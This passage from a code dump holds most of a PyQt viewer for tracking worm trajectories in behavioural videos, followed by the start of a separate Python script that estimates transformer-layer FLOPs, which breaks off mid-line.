worm_ind = self.current_worm_index\n\n if self.frame_data is None:\n return\n\n if not worm_ind in self.frame_data['worm_index_manual'].values:\n QMessageBox.critical(\n self,\n 'The selected worm is not in this frame.',\n 'Select a worm in the current frame to label.',\n QMessageBox.Ok)\n return\n\n good = self.trajectories_data['worm_index_manual'] == worm_ind\n self.trajectories_data.loc[good, 'worm_label'] = label_ind\n self.updateImage()\n\n\nclass ROIWorm():\n def __init__(self, wormCanvas, comboBox_ROI, checkBox_ROI):\n self.worm_index = None\n self.wormCanvas = wormCanvas\n self.comboBox_ROI = comboBox_ROI\n self.checkBox_ROI = checkBox_ROI\n\n self.comboBox_ROI.activated.connect(self.selectROI)\n\n def selectROI(self, index):\n try:\n self.worm_index = int(self.comboBox_ROI.itemText(index))\n except ValueError:\n self.worm_index = None\n\n @property\n def isDrawSkel(self):\n return self.checkBox_ROI.isChecked()\n\n\nclass ROIManager(TrackerViewerAuxGUI):\n def __init__(self, ui):\n\n super().__init__(ui)\n self.rois = [\n ROIWorm(\n self.ui.wormCanvas1,\n self.ui.comboBox_ROI1,\n self.ui.checkBox_ROI1\n ),\n ROIWorm(\n self.ui.wormCanvas2,\n self.ui.comboBox_ROI2,\n self.ui.checkBox_ROI2\n )\n ]\n\n\n self.ui.radioButton_ROI1.setShortcut(QKeySequence(Qt.Key_Up))\n self.ui.radioButton_ROI2.setShortcut(QKeySequence(Qt.Key_Down))\n\n\n self.ui.checkBox_ROI1.stateChanged.connect(partial(self._updateROI, self.rois[0]))\n self.ui.checkBox_ROI2.stateChanged.connect(partial(self._updateROI, self.rois[1]))\n\n self.ui.comboBox_ROI1.activated.connect(partial(self._updateROI, self.rois[0]))\n self.ui.comboBox_ROI2.activated.connect(partial(self._updateROI, self.rois[1]))\n\n # flags for RW and FF\n self.RW, self.FF = 1, 2\n 
self.ui.pushButton_ROI1_RW.clicked.connect(partial(self.roiRWFF, self.RW, self.rois[0]))\n self.ui.pushButton_ROI1_FF.clicked.connect(partial(self.roiRWFF, self.FF, self.rois[0]))\n self.ui.pushButton_ROI2_RW.clicked.connect(partial(self.roiRWFF, self.RW, self.rois[1]))\n self.ui.pushButton_ROI2_FF.clicked.connect(partial(self.roiRWFF, self.FF, self.rois[1]))\n\n @property\n def current_roi(self):\n if self.ui.radioButton_ROI1.isChecked():\n return self.rois[0]\n elif self.ui.radioButton_ROI2.isChecked():\n return self.rois[1]\n else:\n raise ValueError(\"I shouldn't be here\")\n\n @property\n def current_worm_index(self):\n return self.current_roi.worm_index\n\n def updateSkelFile(self, skeletons_file):\n for roi in self.rois:\n roi.worm_index = None\n super().updateSkelFile(skeletons_file)\n\n def keyPressEvent(self, event):\n #MORE SHORTCUTS\n # go the the start of end of a trajectory\n if event.key() == Qt.Key_BracketLeft:\n\n self.roiRWFF(self.RW, self.current_roi)\n\n elif event.key() == Qt.Key_BracketRight:\n\n self.roiRWFF(self.FF, self.current_roi)\n\n super().keyPressEvent(event)\n\n\n def updateROIcomboBox(self, roi):\n # update valid index for the comboBox\n roi.comboBox_ROI.clear()\n\n if roi.worm_index is not None:\n roi.comboBox_ROI.addItem(str(int(roi.worm_index)))\n\n\n for ind in self.frame_data[self.worm_index_type]:\n roi.comboBox_ROI.addItem(str(int(ind)))\n\n if roi.worm_index is None:\n w_ind = float(roi.comboBox_ROI.itemText(0))\n roi.worm_index = int(w_ind)\n\n # function that generalized the updating of the ROI\n def _updateROI(self, roi):\n\n if self.frame_data is None or not self.worm_index_type:\n # no trajectories data presented, nothing to do here\n roi.wormCanvas.clear()\n return\n\n self.updateROIcomboBox(roi)\n\n # extract individual worm ROI\n good = self.frame_data[self.worm_index_type] == roi.worm_index\n row_data = self.frame_data.loc[good].squeeze()\n\n if row_data.size == 0 or \\\n np.isnan(row_data['coord_x']) or \\\n np.isnan(row_data['coord_y']):\n # invalid data nothing to do here\n roi.wormCanvas.clear()\n return\n\n worm_img, roi_corner = getWormROI(self.frame_img,\n row_data['coord_x'],\n row_data['coord_y'],\n row_data['roi_size']\n )\n\n roi_ori_size = worm_img.shape\n worm_img = np.ascontiguousarray(worm_img)\n worm_qimg = self._convert2Qimg(worm_img)\n\n canvas_size = min(roi.wormCanvas.height(), roi.wormCanvas.width())\n worm_qimg = worm_qimg.scaled(\n canvas_size, canvas_size, Qt.KeepAspectRatio)\n\n worm_qimg = self.drawSkelResult(worm_img, worm_qimg, row_data, roi.isDrawSkel, roi_corner, read_center=False)\n\n pixmap = QPixmap.fromImage(worm_qimg)\n roi.wormCanvas.setPixmap(pixmap)\n\n def updateROIs(self):\n for roi in self.rois:\n self._updateROI(roi)\n\n def clearROIs(self):\n for roi in self.rois:\n roi.wormCanvas.clear()\n\n # move to the first or the last frames of a trajectory\n def roiRWFF(self, rwff, roi):\n\n if self.frame_data is None:\n return\n\n # use 1 for rewind RW or 2 of fast forward\n good = self.trajectories_data[self.worm_index_type] == roi.worm_index\n frames = self.trajectories_data.loc[good, 'frame_number']\n\n if frames.size == 0:\n return\n\n if rwff == self.RW:\n self.frame_number = frames.min()\n elif rwff == self.FF:\n self.frame_number = frames.max()\n else:\n raise ValueError('Invalid rwff value : {} '.format(rwff))\n\n self.ui.spinBox_frame.setValue(self.frame_number)\n\nclass TrajectoryEditor(ROIManager):\n def __init__(self, ui):\n super().__init__(ui)\n 
self.ui.pushButton_join.clicked.connect(self.joinTraj)\n self.ui.pushButton_split.clicked.connect(self.splitTraj)\n\n #SHORTCUTS\n self.ui.pushButton_join.setShortcut(QKeySequence(Qt.Key_J))\n self.ui.pushButton_split.setShortcut(QKeySequence(Qt.Key_S))\n\n def enable_trajectories_buttons(self, value):\n self.ui.pushButton_join.setEnabled(value)\n self.ui.pushButton_split.setEnabled(value)\n\n def joinTraj(self):\n if self.worm_index_type != 'worm_index_manual' \\\n or self.frame_data is None:\n return\n\n worm_ind1 = self.rois[0].worm_index\n worm_ind2 = self.rois[1].worm_index\n\n if worm_ind1 == worm_ind2:\n QMessageBox.critical(\n self,\n 'Cannot join the same trajectory with itself',\n 'Cannot join the same trajectory with itself.',\n QMessageBox.Ok)\n return\n\n index1 = (self.trajectories_data[\n 'worm_index_manual'] == worm_ind1).values\n index2 = (self.trajectories_data[\n 'worm_index_manual'] == worm_ind2).values\n\n # if the trajectories do not overlap they shouldn't have frame_number\n # indexes in commun\n frame_number = self.trajectories_data.loc[\n index1 | index2, 'frame_number']\n\n if frame_number.size != np.unique(frame_number).size:\n QMessageBox.critical(\n self,\n 'Cannot join overlaping trajectories',\n 'Cannot join overlaping trajectories.',\n QMessageBox.Ok)\n return\n\n if not (worm_ind1 in self.frame_data[\n 'worm_index_manual'].values or worm_ind2 in self.frame_data['worm_index_manual'].values):\n reply = QMessageBox.question(\n self,\n 'Message',\n \"The none of the selected worms to join is not in this frame. Are you sure to continue?\",\n QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No)\n\n if reply == QMessageBox.No:\n return\n\n # get the first row for each segment to extract some data\n first_row1 = self.trajectories_data.loc[index1, :].iloc[0]\n first_row2 = self.trajectories_data.loc[index2, :].iloc[0]\n\n # join trajectories\n self.trajectories_data.loc[\n index2, 'worm_label'] = first_row1['worm_label']\n self.trajectories_data.loc[index2, 'worm_index_manual'] = worm_ind1\n\n self.rois[0].worm_index = worm_ind1\n self.rois[1].worm_index = worm_ind1\n\n #this might be too slow. I might need to change it\n self.traj_worm_index_grouped = self.trajectories_data.groupby(self.worm_index_type)\n\n self.updateImage()\n\n\n def splitTraj(self):\n if self.worm_index_type != 'worm_index_manual' \\\n or self.frame_data is None:\n return\n\n worm_ind = self.current_worm_index\n\n if not worm_ind in self.frame_data['worm_index_manual'].data:\n QMessageBox.critical(\n self,\n 'Worm index is not in the current frame.',\n 'Worm index is not in the current frame. Select a valid index.',\n QMessageBox.Ok)\n return\n\n last_index = self.trajectories_data['worm_index_manual'].max()\n\n new_ind1 = last_index + 1\n new_ind2 = last_index + 2\n\n good = self.trajectories_data['worm_index_manual'] == worm_ind\n frames = self.trajectories_data.loc[good, 'frame_number']\n frames = frames.sort_values(inplace=False)\n\n good = frames < self.frame_number\n index1 = frames[good].index\n index2 = frames[~good].index\n self.trajectories_data.ix[index1, 'worm_index_manual'] = new_ind1\n self.trajectories_data.ix[index2, 'worm_index_manual'] = new_ind2\n\n self.rois[0].index = new_ind1\n self.rois[1].index = new_ind2\n\n #this might be too slow. 
I might need to change it\n self.traj_worm_index_grouped = self.trajectories_data.groupby(self.worm_index_type)\n\n self.updateImage()\n\nclass FeatureReaderBase(TrackerViewerAuxGUI):\n index_cols = ['worm_index', 'timestamp', 'motion_modes', 'skeleton_id', 'well_name']\n valid_fields = ['/timeseries_data', '/features_timeseries']\n\n def __init__(self, ui):\n self.timeseries_data = None\n self.feat_column = ''\n\n super().__init__(ui)\n\n def updateSkelFile(self, skeletons_file):\n super().updateSkelFile(skeletons_file)\n try:\n self.traj_colors = {}\n with pd.HDFStore(self.skeletons_file, 'r') as ske_file_id:\n for field in self.valid_fields:\n if field in ske_file_id:\n self.timeseries_data = ske_file_id[field]\n\n if field == '/timeseries_data':\n blob_features = ske_file_id['/blob_features']\n blob_features.columns = ['blob_' + x for x in blob_features.columns]\n self.timeseries_data = pd.concat((self.timeseries_data, blob_features), axis=1)\n break\n else:\n raise KeyError\n\n if not len(self.timeseries_data) != len(self.trajectories_data):\n ValueError('timeseries_data and trajectories_data does not match. You might be using an old version of featuresN.hdf5')\n\n\n self.valid_features = [x for x in self.timeseries_data.columns if x not in self.index_cols]\n\n\n except (TypeError, AttributeError, IOError, KeyError, tables.exceptions.HDF5ExtError):\n self.valid_features = None\n self.timeseries_data = None\n\nclass MarkersDrawer(FeatureReaderBase):\n def __init__(self, ui):\n super().__init__(ui)\n\n self.traj_colors = {}\n self.n_points_traj = 250\n self.n_colors = 256\n cmap = matplotlib.cm.get_cmap(\"bwr\")\n palette = [cmap(x) for x in np.linspace(0, 1, self.n_colors)]\n #palette = sns.color_palette(\"RdBu_r\", self.n_colors)\n palette = np.round(np.array(palette)*255).astype(np.int)\n self.palette = [QColor(*x) for x in palette]\n\n\n self.drawT = {x: self.ui.comboBox_drawType.findText(x , flags=Qt.MatchContains)\n for x in ['boxes', 'traj']}\n\n self.showT = {x: self.ui.comboBox_showLabels.findText(x , flags=Qt.MatchContains)\n for x in ['hide', 'all', 'filter']}\n\n self.ui.comboBox_showLabels.setCurrentIndex(self.showT['all'])\n\n self.ui.comboBox_showLabels.currentIndexChanged.connect(self.updateImage)\n self.ui.comboBox_drawType.currentIndexChanged.connect(self.updateImage)\n\n self.ui.feature_column.currentIndexChanged.connect(self.change_feature)\n\n\n self.ui.feat_max_value.valueChanged.connect(self.updateImage)\n self.ui.feat_min_value.valueChanged.connect(self.updateImage)\n self.ui.is_color_features.stateChanged.connect(self.updateImage)\n\n self.enable_color_feats(False)\n\n\n self.ui.spinBox_step.valueChanged.connect(self.updateImage)\n\n def updateSkelFile(self, skeletons_file):\n self.ui.is_color_features.setChecked(False)\n\n super().updateSkelFile(skeletons_file)\n\n self.ui.feature_column.clear()\n if self.timeseries_data is None:\n #no feature data\n self.enable_color_feats(False)\n else:\n self.enable_color_feats(True)\n self.ui.feature_column.addItems(self.valid_features)\n self._h_find_feat_limits()\n\n def change_feature(self):\n self._h_find_feat_limits()\n self.updateImage()\n\n def _h_find_feat_limits(self):\n self.feat_column = str(self.ui.feature_column.currentText())\n print(self.feat_column)\n\n if self.feat_column and self.timeseries_data is not None:\n f_max = self.timeseries_data[self.feat_column].max()\n f_min = self.timeseries_data[self.feat_column].min()\n q1, q2 = self.timeseries_data[self.feat_column].quantile([0.02, 0.98])\n\n else:\n f_min, 
f_max, q1, q2 = 0,0,0,0\n\n self.ui.feat_max_value.setRange(f_min, f_max)\n self.ui.feat_min_value.setRange(f_min, f_max)\n self.ui.feat_min_value.setValue(q1)\n self.ui.feat_max_value.setValue(q2)\n\n\n def enable_color_feats(self, value):\n self.ui.feature_column.setEnabled(value)\n self.ui.feat_min_value.setEnabled(value)\n self.ui.feat_max_value.setEnabled(value)\n self.ui.is_color_features.setEnabled(value)\n\n\n def _h_assign_feat_color(self, irow):\n\n feat_val = self.timeseries_data.loc[irow, self.feat_column]\n\n if (feat_val != feat_val):\n return Qt.black\n\n #this function can and should be optimized\n f_min = self.ui.feat_min_value.value()\n f_max = self.ui.feat_max_value.value()\n\n if f_min == f_max: #dummy range in case all the values are the same\n f_min, f_max = -1, 1\n elif f_min > f_max:\n return Qt.black\n\n nn = np.clip((feat_val - f_min)/(f_max - f_min), 0, 1)\n ind = int(np.round(nn*(self.n_colors-1)))\n\n col = self.palette[ind]\n return col\n\n\n def draw_worm_markers(self, image):\n '''\n Draw traj worm trajectory.\n '''\n if not self.worm_index_type in self.frame_data or \\\n self.ui.comboBox_showLabels.currentIndex() == self.showT['hide']:\n return\n\n if hasattr(self, 'current_worm_index'):\n current_index = self.current_worm_index\n else:\n current_index = -1\n\n painter = QPainter()\n painter.begin(image)\n\n self.fontsize = max(1, max(image.height(), image.width()) // 120)\n\n penwidth = max(1, max(image.height(), image.width()) // 800)\n self.penwidth = penwidth if penwidth % 2 == 1 else penwidth + 1\n\n if not self.label_type in self.frame_data:\n self.frame_data[self.label_type] = self.wlab['U']\n\n for row_id, row_data in self.frame_data.iterrows():\n # check if the coordinates are nan\n if np.isnan(row_data['coord_x']) or np.isnan(row_data['coord_y']):\n continue\n\n #if select between showing filtered index or not\n if self.ui.comboBox_showLabels.currentIndex() == self.showT['filter']:\n continue\n\n is_current_index = current_index == int(row_data[self.worm_index_type])\n\n cb_ind = self.ui.comboBox_drawType.currentIndex()\n if cb_ind == self.drawT['boxes']:\n self.draw_boxes(painter, row_id, row_data, is_current_index)\n elif cb_ind == self.drawT['traj']:\n self.draw_trajectories(painter, row_data, is_current_index)\n\n\n painter.end()\n\n def _h_get_trajectory(self, worm_index, current_frame):\n worm_data = self.traj_worm_index_grouped.get_group(worm_index)\n valid_index = worm_data.index[worm_data['frame_number']<= current_frame]\n\n ini = max(0, valid_index.size - self.frame_step*self.n_points_traj)\n traj_ind = valid_index.values[ini::self.frame_step]\n traj_data = worm_data.loc[traj_ind]\n return traj_data\n\n\n def draw_trajectories(self, painter, row_data, is_current_index):\n if self.traj_worm_index_grouped is None:\n return\n worm_index = int(row_data[self.worm_index_type])\n current_frame = row_data['frame_number']\n traj_data = self._h_get_trajectory(worm_index, current_frame)\n traj_data = traj_data.dropna(subset=['coord_x', 'coord_y'])\n\n x_v = traj_data['coord_x'].round()\n y_v = traj_data['coord_y'].round()\n points = [QPointF(*map(int, c)) for c in zip(x_v, y_v)]\n\n if self.ui.is_color_features.isChecked():\n\n vec_color = [self._h_assign_feat_color(x) for x in traj_data.index]\n\n pen = QPen()\n pen.setWidth(self.penwidth)\n for p1, p2, c in zip(points[1:], points[:-1], vec_color):\n pen.setColor(c)\n painter.setPen(pen)\n painter.drawLine(p1, p2)\n else:\n pol = QPolygonF()\n for p in points:\n pol.append(p)\n\n if not worm_index 
in self.traj_colors:\n self.traj_colors[worm_index] = QColor(*np.random.randint(50, 230, 3))\n col = self.traj_colors[worm_index]\n\n pen = QPen()\n pen.setWidth(self.penwidth)\n pen.setColor(col)\n painter.setPen(pen)\n painter.drawPolyline(pol)\n\n def draw_boxes(self, painter, row_id, row_data, is_current_index):\n '''\n Draw traj worm trajectory.\n '''\n worm_index = int(row_data[self.worm_index_type])\n x = int(round(row_data['coord_x']))\n y = int(round(row_data['coord_y']))\n\n label_color = self.wlabC[int(row_data[self.label_type])]\n if not self.ui.is_color_features.isChecked():\n label_color = self.wlabC[int(row_data[self.label_type])]\n else:\n label_color = self._h_assign_feat_color(row_id)\n\n\n pen = QPen()\n pen.setColor(label_color)\n pen.setWidth(self.penwidth)\n painter.setPen(pen)\n painter.setFont(QFont('Decorative', self.fontsize))\n\n painter.drawText(x, y, str(worm_index))\n\n bb = row_data['roi_size']\n painter.drawRect(x - bb / 2, y - bb / 2, bb, bb)\n\n if is_current_index:\n\n b_size = bb//5\n offset = bb/2 - b_size\n painter.fillRect(x + offset, y + offset, b_size, b_size, QBrush(label_color))\n\n\nclass PlotCommunicator(FeatureReaderBase, ROIManager):\n def __init__(self, ui=''):\n super().__init__(ui)\n self.ui.pushButton_plot.setEnabled(False)\n self.ui.pushButton_plot.clicked.connect(self.show_plot)\n self.plotter = None\n\n def closePrev(self):\n if self.plotter is not None:\n self.plotter.close()\n self.plotter = None\n\n def updateSkelFile(self, skeletons_file):\n super().updateSkelFile(skeletons_file)\n self.closePrev()\n if self.timeseries_data is None:\n self.ui.pushButton_plot.setEnabled(False)\n else:\n self.ui.pushButton_plot.setEnabled(True)\n\n def show_plot(self):\n self.closePrev()\n\n self.plotter = PlotFeatures(self.skeletons_file,\n self.timeseries_data,\n self.traj_worm_index_grouped,\n self.time_units,\n self.xy_units,\n self.fps,\n parent = self)\n\n self.plotter.setWindowFlags(self.plotter.windowFlags() | Qt.WindowStaysOnTopHint)\n\n self.plotter.show()\n self.update_plot()\n\n def update_plot(self):\n if self.plotter:\n self.plotter.plot(self.current_worm_index, self.feat_column)\n\nclass MWTrackerViewer_GUI( MarkersDrawer, PlotCommunicator,\n ContourDrawer, BlobLabeler, IntensityLabeler, TrajectoryEditor, WellsDrawer):\n\n def __init__(self, ui='', argv=''):\n if not ui:\n super().__init__(Ui_MWTrackerViewer())\n else:\n super().__init__(ui)\n\n self.setWindowTitle(\"Multi-Worm Viewer\")\n\n self.vfilename = '' if len(argv) <= 1 else argv[1]\n self.videos_dir = r\"/Volumes/behavgenom$/GeckoVideo/MaskedVideos/\"\n self.results_dir = ''\n self.skeletons_file = ''\n self.worm_index_type = 'worm_index_manual'\n self.frame_data = None\n\n\n self.ui.comboBox_labelType.currentIndexChanged.connect(self.selectWormIndexType)\n\n self.ui.pushButton_save.clicked.connect(self.saveData)\n\n # select worm ROI when doubleclick a worm\n self.mainImage._canvas.mouseDoubleClickEvent = self.selectWorm\n self.mainImage._canvas.mouseRightClickEvent = self.toggleWellStatus\n\n self.ui.comboBox_ROI1.activated.connect(self.update_plot)\n self.ui.comboBox_ROI2.activated.connect(self.update_plot)\n\n def saveData(self):\n '''save data from manual labelling. pytables saving format is more convenient than pandas'''\n\n if os.name == 'nt':\n # I Windows the paths return by QFileDialog use / as the file\n # separation character. 
We need to correct it.\n for field_name in ['vfilename', 'skeletons_file']:\n setattr(\n self, field_name, getattr(\n self, field_name).replace(\n '/', os.sep))\n has_skeletons_file = ((self.skeletons_file is not None)\n and (self.skeletons_file != ''))\n if has_skeletons_file:\n save_modified_table(self.skeletons_file,\n self.trajectories_data,\n 'trajectories_data')\n\n if self.is_fov_tosplit:\n if has_skeletons_file:\n self.fovsplitter.write_fov_wells_to_file(self.skeletons_file)\n else:\n warnings.warn('No skeletons file. Saving wells info in masked video')\n self.fid.close()\n self.fovsplitter.write_fov_wells_to_file(self.vfilename)\n # self.fid = tables.File(self.vfilename, 'r')\n self.updateVideoFile(self.vfilename)\n\n if has_skeletons_file:\n self.updateSkelFile(self.skeletons_file)\n\n\n\n def updateVideoFile(self, vfilename):\n super().updateVideoFile(vfilename)\n self.updateImage()\n\n def updateSkelFile(self, skeletons_file):\n super().updateSkelFile(skeletons_file)\n\n if self.trajectories_data is None:\n #empty file nothing to do here\n self.updateImage()\n return\n\n #correct the `worm_index_N` to the actual name `worm_index_manual`\n if 'worm_index_N' in self.trajectories_data:\n self.trajectories_data = self.trajectories_data.rename(\n columns={'worm_index_N': 'worm_index_manual'})\n\n #if this is really a trajectories_data not (_features.hdf5) add `worm_index_manual` if it does not exists\n if not 'worm_index_manual' in self.trajectories_data and not self.is_estimated_trajectories_data:\n self.trajectories_data['worm_label'] = self.wlab['U']\n self.trajectories_data['worm_index_manual'] = self.trajectories_data['worm_index_joined']\n\n #deactiate the save option if we are dealing with estimated data...\n self.ui.pushButton_save.setEnabled(not self.is_estimated_trajectories_data)\n\n\n #add this column if it does not exist\n if not 'has_skeleton' in self.trajectories_data:\n self.trajectories_data['has_skeleton'] = self.trajectories_data['skeleton_id'] >= 0\n\n self.updateWormIndexTypeMenu()\n self.updateImage()\n\n def updateWormIndexTypeMenu(self):\n possible_indexes = [x.replace('worm_index_', '') for x in self.trajectories_data.columns if x.startswith('worm_index_')]\n assert len(set(possible_indexes)) == len(possible_indexes) #all indexes ending must be different\n\n menu_names = sorted([x + ' index' for x in possible_indexes])\n self.ui.comboBox_labelType.clear()\n self.ui.comboBox_labelType.addItems(menu_names)\n if 'manual' in possible_indexes:\n dd = self.ui.comboBox_labelType.findText('manual index')\n self.ui.comboBox_labelType.setCurrentIndex(dd);\n\n self.selectWormIndexType()\n\n def selectWormIndexType(self):\n index_option = self.ui.comboBox_labelType.currentText()\n\n if not index_option:\n return\n assert index_option.endswith(' index')\n self.worm_index_type = 'worm_index_' + index_option.replace(' index', '')\n\n # select between automatic and manual worm indexing and label\n if self.worm_index_type == 'worm_index_manual':\n self.label_type = 'worm_label'\n self.enable_trajectories_buttons(True)\n self.enable_label_buttons(True)\n else:\n self.label_type = 'auto_label'\n self.enable_trajectories_buttons(False)\n self.enable_label_buttons(False)\n\n #recalculate the grouped indexes\n self.traj_worm_index_grouped = self.trajectories_data.groupby(self.worm_index_type)\n\n self.updateImage()\n\n\n # update image\n def updateImage(self):\n if (self.image_group is None) and (self.isimgstore is False):\n return\n\n super(TrackerViewerAuxGUI, 
self).readCurrentFrame()\n\n # read the data of the particles that exists in the frame\n self.frame_data = self.getFrameData(self.frame_number)\n\n #draw extra info only if the worm_index_type is valid\n if self.frame_data is not None and \\\n self.worm_index_type in self.frame_data:\n #filter any -1 index\n self.frame_data = self.frame_data[self.frame_data[self.worm_index_type]>=0]\n if self.frame_data.size > 0:\n self.draw_worm_markers(self.frame_qimg)\n self.draw_food_contour(self.frame_qimg)\n\n self.updateROIs()\n\n else:\n self.clearROIs()\n # plot wells\n self.draw_wells(self.frame_qimg)\n\n # create the pixmap for the label\n self.mainImage.setPixmap(self.frame_qimg)\n\n self.display_intensity()\n\n def selectWorm(self, event):\n\n x = event.pos().x()\n y = event.pos().y()\n print(x,y)\n\n if self.frame_data is None or self.frame_data.size == 0:\n return\n\n R = (x - self.frame_data['coord_x'])**2 + \\\n (y - self.frame_data['coord_y'])**2\n\n ind = R.idxmin()\n\n good_row = self.frame_data.loc[ind]\n if np.sqrt(R.loc[ind]) < good_row['roi_size']:\n self.current_roi.worm_index = int(good_row[self.worm_index_type])\n self.update_plot()\n\n self.updateImage()\n\n def toggleWellStatus(self, event):\n # abort if not multifov\n if self.is_fov_tosplit != True:\n return\n # event is for sure a right click or this does not get called\n x = event.pos().x()\n y = event.pos().y()\n # this will always return something. n/a if clicking outside a well\n well_name = self.fovsplitter.find_well_of_xy(x, y)[0].decode('utf-8')\n idx = self.fovsplitter.wells['well_name'] == str(well_name)\n self.fovsplitter.wells.loc[idx, 'is_good_well'] = \\\n np.mod(self.fovsplitter.wells.loc[idx, 'is_good_well']+1, 2)\n# print(self.fovsplitter.wells)\n self.updateImage()\n\n def joinTraj(self):\n super().joinTraj()\n self.update_plot()\n\n def splitTraj(self):\n super().splitTraj()\n self.update_plot()\n\n def change_feature(self):\n super().change_feature()\n self.update_plot()\n\nif __name__ == '__main__':\n import sys\n\n app = QApplication(sys.argv)\n main = MWTrackerViewer_GUI(argv=sys.argv)\n\n #mask_file = '/Users/avelinojaver/OneDrive - Imperial College London/tierpsy_examples/mutliworm_example/BRC20067_worms10_food1-10_Set2_Pos5_Ch2_02062017_121709.hdf5'\n #mask_file = '/Volumes/rescomp1/data/WormData/screenings/Pratheeban/First_Set/MaskedVideos/Old_Adult/16_07_22/W3_ELA_1.0_Ch1_22072016_131149.hdf5'\n #mask_file = '/Users/avelinojaver/Documents/GitHub/tierpsy-tracker/tests/data/AVI_VIDEOS/MaskedVideos/AVI_VIDEOS_1.hdf5'\n# mask_file = '/Users/avelinojaver/Documents/GitHub/tierpsy-tracker/tests/data/WT2/MaskedVideos/WT2.hdf5'\n mask_file = '/Users/lferiani/Hackathon/multiwell_tierpsy/12_FEAT_TIERPSY_forGUI/MaskedVideos/20191205/syngenta_screen_run1_bluelight_20191205_151104.22956805/metadata.hdf5'\n main.updateVideoFile(mask_file)\n\n main.show()\n sys.exit(app.exec_())\n"} {"ext": "py", "sha": "1a2fe978c192b9bc4458f081aa6ee8b19d6746e0", "content": "from typing import List\n\nimport numpy as np\n\nclass DNNLayer:\n def __init__(self, out_shape, depends_on: List[\"DNNLayer\"] = tuple(), param_count=0):\n assert out_shape is not None # get around varargs restriction\n self.extra_repr_params = {}\n self.unique_idx = \"{}{:02d}\".format(self.__class__.__name__, id(self) % 100)\n self.out_shape = out_shape\n self.depends_on = depends_on\n self.param_count = param_count\n\n def __repr__(self):\n args = self.extra_repr_params\n args[\"out_shape\"] = self.out_shape\n args[\"param_count\"] = self.param_count\n 
args[\"depends_on\"] = \"[{}]\".format(\", \".join([x.unique_idx for x in self.depends_on]))\n return \"{}({})\".format(self.unique_idx, \",\".join([\"{}={}\".format(k, v) for k, v in args.items()]))\n\nclass QueryKeyValueMatrix(DNNLayer):\n\t# Fusing Query, Key, And Value into 1\n\tdef __init__(self, SEQ_LEN, HIDDEN_DIM, I, ATTN_HEADS, input):\n\t\tsuper().__init__(\n\t\t\tout_shape=(3 * SEQ_LEN,I,ATTN_HEADS), # [seq_lean X intermediate_vector_dim] for 12 heads \n\t\t\tdepends_on=[input] if input is not None else [],\n\t\t\tparam_count=3 * HIDDEN_DIM*I*ATTN_HEADS)\n\t\tself.flop = 3 * SEQ_LEN*HIDDEN_DIM*I*ATTN_HEADS\n\nclass QKTMatrix(DNNLayer):\n\t# Fusing Masking and Dropout\n\tdef __init__(self, SEQ_LEN, HIDDEN_DIM, I, ATTN_HEADS, input):\n\t\tsuper().__init__(\n\t\t\tout_shape=(SEQ_LEN,I,ATTN_HEADS),\n\t\t\tdepends_on=[input] if input is not None else [], # Different to accept a list\n\t\t\tparam_count=0)\n\t\tself.flop = SEQ_LEN*HIDDEN_DIM*I*ATTN_HEADS + np.prod(self.out_shape) + np.prod(self.out_shape) # QKT + mask + dropout\n\nclass Mask(DNNLayer):\n def __init__(self, input: DNNLayer):\n super().__init__(\n \tout_shape=input.out_shape, \n \tdepends_on=[input] if input is not None else [],\n \tparam_count=0)\n self.flop = np.prod(self.out_shape)\n\nclass QKTVMatrix(DNNLayer):\n\t# QKTV + Concat\n\tdef __init__(self, SEQ_LEN, HIDDEN_DIM, I, ATTN_HEADS, input):\n\t\tsuper().__init__(\n\t\t\tout_shape=(SEQ_LEN,I * ATTN_HEADS),\n\t\t\tdepends_on=[input] if input is not None else [],\n\t\t\tparam_count=0)\n\t\tself.flop = SEQ_LEN*HIDDEN_DIM*I*ATTN_HEADS + SEQ_LEN*HIDDEN_DIM*I*ATTN_HEADS # QKTVMatrix + Concat\n\nclass Concat(DNNLayer):\n\tdef __init__(self, SEQ_LEN, HIDDEN_DIM, I, ATTN_HEADS, input):\n\t\tsuper().__init__(\n\t\t\tout_shape=(SEQ_LEN,I * ATTN_HEADS),\n\t\t\tdepends_on=[input] if input is not None else [],\n\t\t\tparam_count=HIDDEN_DIM*I*ATTN_HEADS)\n\t\t# self.flop = SEQ_LEN*HIDDEN_DIM*I*ATTN_HEADS\n\t\tself.flop = 0\n\nclass LinearLayerReLU(DNNLayer):\n def __init__(self, in_features: int, out_features: int, input: DNNLayer):\n super().__init__(\n self.find_outshape(in_features, out_features, input),\n [input] if input is not None else [],\n param_count=((in_features + 1) * out_features),\n )\n self.extra_repr_params[\"in_features\"] = in_features\n self.extra_repr_params[\"out_features\"] = out_features\n self.in_features = in_features\n self.out_features = out_features\n self.flop = 2 * self.param_count + self.out_features + np.prod(self.out_shape) # (Linear) + ReLU\n\n def find_outshape(self, in_features, out_features, input):\n assert len(input.out_shape) == 2 and input.out_shape[1] == in_features, f\"{input.out_shape}, {in_features}\"\n return (input.out_shape[0], out_features)\n\ndef selfattn_flop(B, H, K, Tc, Tg, cache_length=0):\n\tassert cache_length >= 0, \"cache_length should be non-negative\"\n\n\tx = DNNLayer(out_shape=(B, Tc, H))\n\tqkt = QKTMatrix(SEQ_LEN=Tc, HIDDEN_DIM=H, I=H//K, ATTN_HEADS=K, input=x)\n\tmask = Mask(input=x)\n\tflops = qkt.flop + mask.flop\n\tfor i in range(1, Tg):\n\t\tx = DNNLayer(out_shape=(B, Tc + i, H))\n\t\tif i <= cache_length:\n\t\t\tqkt = QKTMatrix(SEQ_LEN=1, HIDDEN_DIM=H, I=H//K, ATTN_HEADS=K, input=x)\n\t\telse:\n\t\t\tqkt = QKTMatrix(SEQ_LEN=Tc + i, HIDDEN_DIM=H, I=H//K, ATTN_HEADS=K, input=x)\n\t\tflops += qkt.flop\n\n\tprint(f\"selfattn_flop: {flops}\")\n\treturn flops\n\nif __name__ == \"__main__\":\n\t\n\thparams = {\"117M\": (12, 768), \"345M\": (24, 1024), \"762M\": (36, 1280), \"1542M\": (48, 1600)}\n\tK = 4\n\tB, H = 
